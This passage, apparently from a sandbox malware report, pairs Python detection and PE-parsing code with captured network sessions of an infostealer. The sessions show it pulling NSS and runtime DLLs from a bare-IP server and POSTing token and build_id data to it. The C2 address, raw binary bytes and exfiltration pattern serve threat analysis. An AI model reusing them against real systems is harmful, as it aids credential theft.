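    first_bytes: bytes    # first chunk of the response body


# The three DLLs fetched in sessions 14-16; the other three are an assumption
# (the rest of the NSS/CRT set) and do not appear in this report.
STEALER_SUPPORT_DLLS = {
    "nss3.dll", "softokn3.dll", "vcruntime140.dll",
    "freebl3.dll", "mozglue.dll", "msvcp140.dll",
}
# Images that legitimately send a Chrome-like User-Agent (assumed list).
BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "browser.exe", "opera.exe", "brave.exe"}
SUSPICIOUS_EXTENSIONS = {".pif", ".scr", ".com", ".cmd"}


def is_ip_literal(host: str) -> bool:
    """True when the Host header is a bare IP address (optional :port)."""
    addr = host.rsplit(":", 1)[0] if host.count(":") == 1 else host
    try:
        ipaddress.ip_address(addr)
        return True
    except ValueError:
        return False


def looks_like_pe(buf: bytes) -> bool:
    """MZ magic and, when the chunk reaches it, a PE\\0\\0 signature at e_lfanew."""
    if len(buf) < 0x40 or buf[:2] != b"MZ":
        return False
    (e_lfanew,) = struct.unpack_from("<I", buf, 0x3C)
    if e_lfanew + 4 > len(buf):
        return True  # header cut off by the chunk boundary; MZ alone still counts
    return buf[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def score_session(s: HttpSession) -> list:
    """Return the list of indicators this session triggers."""
    reasons = []
    _method, _, rest = s.request_line.partition(" ")
    name = rest.split(" ")[0].rsplit("/", 1)[-1].lower()
    image = ntpath.basename(s.process).lower()
    ext = ntpath.splitext(image)[1]
    if name in STEALER_SUPPORT_DLLS:
        reasons.append(f"requests stealer support DLL {name}")
    if is_ip_literal(s.host):
        reasons.append(f"Host is a bare IP literal {s.host}")
    if "Mozilla/" in s.user_agent and image not in BROWSER_IMAGES:
        reasons.append(f"browser User-Agent sent by non-browser image {image}")
    if ext in SUSPICIOUS_EXTENSIONS and "\\temp\\" in s.process.lower():
        reasons.append(f"{ext} image running from a Temp directory")
    if s.content_type == "application/octet-stream" and looks_like_pe(s.first_bytes):
        reasons.append("response body is a PE image")
    return reasons


def flag_sessions(sessions, min_reasons: int = 3) -> dict:
    """Map session_id -> reasons for every session at or above the threshold."""
    flagged = {}
    for s in sessions:
        reasons = score_session(s)
        if len(reasons) >= min_reasons:
            flagged[s.session_id] = reasons
    return flagged


def pe_stub(e_lfanew: int = 0x78) -> bytes:
    """Constructed MZ/PE header prefix standing in for the 16 KiB chunks in
    the report, which start 4d 5a ... and carry PE\\0\\0 at e_lfanew."""
    buf = bytearray(b"MZ" + b"\x00" * (e_lfanew + 2))
    struct.pack_into("<I", buf, 0x3C, e_lfanew)
    buf[e_lfanew:e_lfanew + 4] = b"PE\x00\x00"
    return bytes(buf)


YABROWSER_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
                "(KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36")
CHROME_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
             "(KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36")
GIFT_PIF = r"C:\Users\user\AppData\Local\Temp\366791\Gift.pif"

REPORT_SESSIONS = [
    HttpSession(14, GIFT_PIF, "188.245.87.202", 443, "GET /softokn3.dll HTTP/1.1",
                YABROWSER_UA, "application/octet-stream", 257872, pe_stub(0x78)),
    HttpSession(15, GIFT_PIF, "188.245.87.202", 443, "GET /vcruntime140.dll HTTP/1.1",
                YABROWSER_UA, "application/octet-stream", 80880, pe_stub(0xE8)),
    HttpSession(16, GIFT_PIF, "188.245.87.202", 443, "GET /nss3.dll HTTP/1.1",
                YABROWSER_UA, "application/octet-stream", 2046288, pe_stub(0x78)),
    # Constructed benign control: a real browser fetching a page by hostname.
    HttpSession(99, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                "www.example.com", 443, "GET /index.html HTTP/1.1", CHROME_UA,
                "text/html; charset=utf-8", 1256, b"<!doctype html>"),
]

if __name__ == "__main__":
    for sid, why in flag_sessions(REPORT_SESSIONS).items():
        print(f"session {sid}: " + "; ".join(why))
```

The threshold is deliberately above one: a bare-IP host or an octet-stream PE on its own is common in legitimate updaters, but a non-browser image in Temp combining all five indicators is the stealer staging sequence this report records. Hunt on the same fields in proxy or EDR network telemetry; the Host literal and the three DLL names are the cheapest pivot.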

                                                                        Session ID | Source IP   | Source Port | Destination IP | Destination Port | PID | Process
                                                                        16         | 192.168.2.5 | 49729       | 188.245.87.202 | 443              | 748 | C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:16 UTC | 241 | OUT | GET /nss3.dll HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:16 UTC | 261 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:16 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 2046288
                                                                        Connection: close
                                                                        Last-Modified: Monday, 05-Aug-2024 16:56:16 GMT
                                                                        Cache-Control: no-store, no-cache
                                                                        Accept-Ranges: bytes
                                                                        2024-08-05 16:56:16 UTC16123INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00
                                                                        Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@
                                                                        2024-08-05 16:56:16 UTC16384INData Raw: f2 6b d2 64 89 c7 29 d7 c1 fb 15 01 f3 89 c2 69 f3 90 01 00 00 29 f0 83 e2 03 66 85 d2 0f 94 c2 66 85 ff 0f 95 c6 20 d6 66 85 c0 0f 94 c0 08 f0 0f b6 c0 8d 04 40 8b 55 f0 0f be 84 82 20 7c 1a 10 89 41 10 8a 41 1a fe c8 0f b6 c0 ba 06 00 00 00 0f 49 d0 88 51 1a e9 f7 fe ff ff 83 c2 e8 89 51 0c 8b 41 10 89 45 f0 8b 71 14 40 89 41 10 66 ff 41 1c 0f b7 41 18 a8 03 0f 94 c3 69 f8 29 5c 00 00 8d 97 1c 05 00 00 66 c1 ca 02 0f b7 d2 81 fa 8f 02 00 00 0f 93 c2 20 da 81 c7 10 05 00 00 66 c1 cf 04 0f b7 ff 81 ff a3 00 00 00 0f 92 c6 08 d6 0f b6 d6 8d 14 52 0f be 94 96 20 7c 1a 10 39 55 f0 7c 26 89 f7 c7 41 10 01 00 00 00 8d 56 01 89 51 14 83 fe 0b 7c 12 c7 41 14 00 00 00 00 40 66 89 41 18 66 c7 41 1c 00 00 8a 41 1a fe c0 31 d2 3c 07 0f b6 c0 0f 4d c2 88 41 1a e9 51
                                                                        Data Ascii: kd)i)ff f@U |AAIQQAEq@AfAAi)\f fR |9U|&AVQ|A@fAfAA1<MAQ
                                                                        2024-08-05 16:56:16 UTC | 16384 | IN | Data Raw: 1b 10 51 e8 3d b8 06 00 83 c4 0c 66 83 7f 06 00 74 69 31 db 8b 44 9f 14 be 48 01 1d 10 85 c0 74 02 8b 30 68 d3 fe 1b 10 56 e8 f7 5b 19 00 83 c4 08 85 c0 b8 79 64 1c 10 0f 45 c6 8b 4f 10 0f b6 0c 19 f6 c1 02 ba 98 dc 1c 10 be 48 01 1d 10 0f 44 d6 f6 c1 01 b9 b1 de 1c 10 0f 44 ce 50 52 51 68 7f a0 1b 10 8d 44 24 60 50 e8 d6 b7 06 00 83 c4 14 43 0f b7 47 06 39 c3 72 99 8b 44 24 60 8d 48 01 3b 4c 24 58 0f 83 b7 03 00 00 89 4c 24 60 8b 4c 24 54 c6 04 01 29 eb 25 8b 44 24 04 8b 4c 24 08 8b 44 81 10 0f be 08 8d 54 24 50 51 ff 70 20 68 2c e2 1c 10 52 e8 89 b7 06 00 83 c4 10 f6 44 24 64 07 0f 85 4b 03 00 00 8b 44 24 54 85 c0 74 21 8b 4c 24 60 c6 04 08 00 83 7c 24 5c 00 74 12 f6 44 24 65 04 75 0b 8d 4c 24 50 e8 d4 68 06 00 eb 04 8b 44 24 54 89 44 24 18 8b 45 08 8b
                                                                        Data Ascii: Q=fti1DHt0hV[ydEOHDDPRQhD$`PCG9rD$`H;L$XL$`L$T)%D$L$DT$PQp h,RD$dKD$Tt!L$`|$\tD$euL$PhD$TD$E
                                                                        2024-08-05 16:56:16 UTC | 16384 | IN | Data Raw: 08 11 1e 10 40 a3 08 11 1e 10 3b 05 30 11 1e 10 77 26 8b 35 38 11 1e 10 85 f6 74 15 8b 0d 78 e0 1d 10 81 f9 80 c2 12 10 75 7b 56 ff 15 68 cc 1d 10 89 f8 5e 5f 5b 5d c3 a3 30 11 1e 10 eb d3 a3 0c 11 1e 10 eb b9 89 3d 20 11 1e 10 e9 54 ff ff ff 31 ff eb dc 8b 0d 40 e0 1d 10 ff 15 00 40 1e 10 57 ff d1 83 c4 04 eb ca ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 0b ff ff ff 89 f7 c1 ff 1f 29 f1 19 f8 31 d2 39 0d e4 10 1e 10 19 c2 7d 27 c7 05 50 11 1e 10 00 00 00 00 e9 20 ff ff ff 31 ff e9 6d ff ff ff ff 15 00 40 1e 10 56 ff d1 83 c4 04 e9 7b ff ff ff c7 05 50 11 1e 10 01 00 00 00 8b 1d 38 11 1e 10 85 db 74 2e 8b 0d 78 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 8b 1d 38 11 1e 10 85 db 74 12 8b 0d 70 e0 1d 10 ff 15 00 40 1e 10 53 ff d1 83 c4 04 a1 4c 11 1e 10 8b 0d
                                                                        Data Ascii: @;0w&58txu{Vh^_[]0= T1@@W@V)19}'P 1m@V{P8t.x@S8tp@SL
                                                                        2024-08-05 16:56:16 UTC | 16384 | IN | Data Raw: 44 24 08 8a 40 12 e9 fc fc ff ff 8b 44 24 08 8b 70 44 8b 06 85 c0 0f 84 81 fd ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 67 fd ff ff 8b 44 24 08 8b 70 40 8b 06 85 c0 74 2d 8b 4c 24 08 80 79 0d 00 75 11 8b 48 20 ff 15 00 40 1e 10 6a 01 56 ff d1 83 c4 08 8b 44 24 08 80 78 12 05 74 08 8b 44 24 08 c6 40 12 01 8b 4c 24 08 8a 41 0c 88 41 13 e9 13 fe ff ff 8b 44 24 08 8b 30 8b 4e 1c 85 c9 0f 84 88 fa ff ff 8b 44 24 08 8b b8 ec 00 00 00 ff 15 00 40 1e 10 6a 00 57 56 ff d1 83 c4 0c 89 44 24 0c e9 72 f6 ff ff 8b 4c 24 08 89 81 a0 00 00 00 e9 f7 f9 ff ff 8b 48 04 ff 15 00 40 1e 10 56 ff d1 83 c4 04 c7 06 00 00 00 00 e9 26 fa ff ff 31 f6 46 e9 d2 fc ff ff 31 db f6 44 24 1c 01 0f 84 40 fe ff ff 68 40 7e 1c 10 68 83 e4 00 00 68 14 dd 1b 10
                                                                        Data Ascii: D$@D$pDH@VgD$p@t-L$yuH @jVD$xtD$@L$AAD$0ND$@jWVD$rL$H@V&1F1D$@h@~hh
                                                                        2024-08-05 16:56:17 UTC | 16384 | IN | Data Raw: d8 25 ff ff ff 7f 89 44 24 1c 85 f6 7e 6f 8b 7d 0c 89 54 24 04 8b 0d 30 e4 1d 10 8b 45 08 8b 40 08 89 04 24 ff 15 00 40 1e 10 8d 44 24 10 50 8d 44 24 10 50 56 57 ff 74 24 10 ff d1 85 c0 0f 84 92 00 00 00 8b 44 24 0c 85 c0 8b 54 24 04 74 42 29 c6 72 3e 01 c2 83 d3 00 89 54 24 18 89 d9 81 e1 ff ff ff 7f 89 4c 24 1c 01 c7 85 f6 7f a2 8b 44 24 24 85 c0 0f 85 92 00 00 00 31 ff 8b 4c 24 28 31 e9 e8 9d 64 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 8b 0d 8c e2 1d 10 ff 15 00 40 1e 10 ff d1 89 c2 8b 45 08 89 50 14 83 fa 70 74 05 83 fa 27 75 3f bf 0d 00 00 00 b9 0d 00 00 00 68 ee b2 00 00 8b 45 08 ff 70 1c 68 65 8a 1c 10 e8 c4 1e 14 00 83 c4 0c eb a7 8d 4c 24 24 8d 54 24 08 e8 12 20 14 00 85 c0 0f 85 2a ff ff ff 8b 54 24 08 eb b1 bf 0a 03 00 00 b9 0a 03 00 00 68 f3 b2 00
                                                                        Data Ascii: %D$~o}T$0E@$@D$PD$PVWt$D$T$tB)r>T$L$D$$1L$(1de^_[]@EPpt'u?hEpheL$$T$ *T$h
                                                                        2024-08-05 16:56:17 UTC | 16384 | IN | Data Raw: 0c 38 e8 8e f3 ff ff 43 83 c7 30 3b 5e 68 7c ec 8b 44 24 0c 89 46 68 83 7c 24 04 01 75 72 8b 56 64 8d 1c 40 c1 e3 04 83 7c 1a 1c 00 74 4b 8b 4e 48 8b 01 85 c0 74 42 3d 58 00 1a 10 75 34 8b 86 a8 00 00 00 8b be ac 00 00 00 83 c0 04 83 d7 00 89 74 24 04 89 d6 8b 54 1a 18 0f af fa f7 e2 01 fa 52 50 51 e8 8c 45 12 00 89 f2 8b 74 24 10 83 c4 0c 8b 44 1a 18 89 46 38 31 ff 8b 4c 24 30 31 e9 e8 9f 24 13 00 89 f8 8d 65 f4 5e 5f 5b 5d c3 89 74 24 04 8b 86 e8 00 00 00 89 44 24 08 85 c0 0f 84 88 01 00 00 83 7c 24 0c 00 0f 84 ac 00 00 00 8b 44 24 04 8b 70 64 85 f6 0f 84 9d 00 00 00 8b 44 24 0c 48 8d 3c 40 c1 e7 04 8b 44 3e 14 89 44 24 0c b9 00 02 00 00 31 d2 e8 56 3e ff ff 89 44 24 18 85 c0 0f 84 ce 02 00 00 8d 04 3e 89 44 24 14 8d 04 3e 83 c0 14 89 44 24 08 8b 5c 24
                                                                        Data Ascii: 8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$\$
                                                                        2024-08-05 16:56:17 UTC | 16384 | IN | Data Raw: 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d ff ff
                                                                        Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                        2024-08-05 16:56:17 UTC | 16384 | IN | Data Raw: e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff 01 74
                                                                        Data Ascii: `P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rtt
                                                                        2024-08-05 16:56:17 UTC | 16384 | IN | Data Raw: 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18 00 00
                                                                        Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$
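The 16:56:16 UTC response above begins with an MZ stub and a PE signature, so the first inbound chunk can be parsed straight from the Data Raw bytes. The block below is an added example, not part of the Joe Sandbox report and not code from the sample: it re-enters the bytes the report displays as a constructed input and parses the DOS pointer, COFF file header and PE32 optional header with the standard library. Function, constant and key names are the example's own.

```python
import struct
from datetime import datetime, timezone

# Constructed sample: the bytes the report displays for the first inbound chunk
# of the 16:56:16 UTC response (the "Data Raw" line above), re-laid in 16-byte
# rows. Only this prefix is on the page; the rest of the file is not.
STAGE_HEAD = bytes.fromhex(" ".join((
    "4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00",
    "00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00",
    "00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00",
    "00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00",
    "0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68",
    "69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f",
    "74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20",
    "6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00",
    "d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21",
    "0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00",
    "60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10",
    "00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00",
    "06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00",
    "6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00",
    "00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00",
    "e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00",
)))

MACHINES = {0x14C: "i386", 0x8664: "x86-64", 0x1C0: "ARM", 0xAA64: "ARM64"}
SUBSYSTEMS = {1: "NATIVE", 2: "WINDOWS_GUI", 3: "WINDOWS_CUI"}
IMAGE_FILE_DLL = 0x2000
DLL_CHARACTERISTICS = {
    0x0040: "DYNAMIC_BASE", 0x0080: "FORCE_INTEGRITY", 0x0100: "NX_COMPAT",
    0x0400: "NO_SEH", 0x4000: "GUARD_CF", 0x8000: "TERMINAL_SERVER_AWARE",
}


def parse_pe_header(data: bytes) -> dict:
    """Parse the DOS e_lfanew pointer, the COFF file header and the PE32
    optional header of a captured image prefix. Raises ValueError for
    anything that is not a PE32 image (PE32+ has magic 0x20b)."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ signature")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature at e_lfanew")
    coff = e_lfanew + 4
    (machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, characteristics) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    (magic, maj_linker, min_linker, size_code, _init, _uninit, entry,
     _base_code, _base_data, image_base) = struct.unpack_from("<HBBIIIIIII", data, opt)
    if magic != 0x10B:
        raise ValueError(f"not a PE32 optional header (magic {magic:#x})")
    (sect_align, file_align, maj_os, min_os, _maj_img, _min_img, _maj_ss, _min_ss,
     _w32, size_image, _size_headers, checksum, subsystem,
     dll_chars) = struct.unpack_from("<IIHHHHHHIIIIHH", data, opt + 32)
    return {
        "machine": MACHINES.get(machine, f"{machine:#06x}"),
        "sections": nsections,
        "timestamp": timestamp,
        # The link timestamp is attacker-controlled: treat it as a hint, not evidence.
        "compiled_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%dT%H:%M:%SZ"),
        "is_dll": bool(characteristics & IMAGE_FILE_DLL),
        "optional_header_size": opt_size,
        "linker": f"{maj_linker}.{min_linker}",
        "os_version": f"{maj_os}.{min_os}",
        "size_of_code": size_code,
        "image_base": image_base,
        "entry_point_va": image_base + entry,
        "size_of_image": size_image,
        "section_alignment": sect_align,
        "file_alignment": file_align,
        "checksum": checksum,
        "subsystem": SUBSYSTEMS.get(subsystem, str(subsystem)),
        "dll_characteristics": [name for bit, name in DLL_CHARACTERISTICS.items() if dll_chars & bit],
    }


if __name__ == "__main__":
    for key, value in parse_pe_header(STAGE_HEAD).items():
        print(f"{key:>22}: {value:#x}" if isinstance(value, int) and not isinstance(value, bool) else f"{key:>22}: {value}")
```

On these bytes the parser reports a 32-bit image whose Characteristics (0x2122) include IMAGE_FILE_DLL, with ImageBase 0x10000000, SizeOfImage 0x1f7000 and entry point 0x1014a360. That gives a quick consistency check on the later chunks of the same download: the indirect calls they contain, such as `ff 15 00 40 1e 10` (call dword ptr [0x101e4000]) in the 16:56:16 chunks, resolve inside the 0x10000000 to 0x101f7000 range this header implies.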


                                                                        Session ID: 17 | Source IP: 192.168.2.5 | Source Port: 49730 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:19 UTC | 326 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----DGDBFBFCBFBKECAAKJKF
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 1145
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:19 UTC | 1145 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 44 42 46 42 46 43 42 46 42 4b 45 43 41 41 4b 4a 4b 46 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------DGDBFBFCBFBKECAAKJKFContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------DGDBFBFCBFBKECAAKJKFContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------DGDBFBFCBFBKECAAKJKFCont
                                                                        2024-08-05 16:56:20 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:20 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
                                                                        2024-08-05 16:56:20 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                        Data Ascii: 2ok0


                                                                        Session ID: 18 | Source IP: 192.168.2.5 | Source Port: 49731 | Destination IP: 188.245.87.202 | Destination Port: 443 | PID: 748 | Process: C:\Users\user\AppData\Local\Temp\366791\Gift.pif
                                                                        Timestamp | Bytes transferred | Direction | Data
                                                                        2024-08-05 16:56:20 UTC | 325 | OUT | POST / HTTP/1.1
                                                                        Content-Type: multipart/form-data; boundary=----HDHCFIJEGCAKJJKEHJJE
                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 YaBrowser/24.6.0.1 Safari/537.36
                                                                        Host: 188.245.87.202
                                                                        Content-Length: 331
                                                                        Connection: Keep-Alive
                                                                        Cache-Control: no-cache
                                                                        2024-08-05 16:56:20 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 33 37 31 37 36 34 63 66 38 65 66 63 31 62 34 30 64 66 63 31 35 61 36 66 66 38 37 34 62 33 30 31 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 64 63 30 63 39 66 33 39 37 31 63 61 63 65 38 32 36 65 39 63 62 31 39 31 36 64 39 64 33 61 36 36 0d 0a 2d 2d 2d 2d 2d 2d 48 44 48 43 46 49 4a 45 47 43 41 4b 4a 4a 4b 45 48 4a 4a 45 0d 0a 43 6f 6e 74
                                                                        Data Ascii: ------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="token"371764cf8efc1b40dfc15a6ff874b301------HDHCFIJEGCAKJJKEHJJEContent-Disposition: form-data; name="build_id"dc0c9f3971cace826e9cb1916d9d3a66------HDHCFIJEGCAKJJKEHJJECont
                                                                        2024-08-05 16:56:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                        Server: nginx
                                                                        Date: Mon, 05 Aug 2024 16:56:21 GMT
                                                                        Content-Type: text/html; charset=UTF-8
                                                                        Transfer-Encoding: chunked
                                                                        Connection: close
